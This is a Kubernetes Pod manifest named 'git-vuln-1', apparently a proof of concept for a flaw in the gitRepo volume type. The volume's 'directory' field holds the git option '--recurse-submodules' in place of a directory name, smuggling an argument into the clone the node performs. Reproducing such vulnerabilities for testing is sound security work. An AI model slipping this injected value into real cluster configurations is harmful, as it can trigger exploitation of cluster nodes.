apiVersion: v1
kind: Pod
metadata:
  name:   git-vuln-1
spec:
  containers:
    - name: git-vuln
      image: alpine:3.5
      volumeMounts:
        - name: git
          mountPath: /vuln
      args:
        - sleep
        - "100000"
  volumes:
    - name: git
      gitRepo:
        repository: https://github.com/tallclair/tconf.git
        directory: "--recurse-submodules"
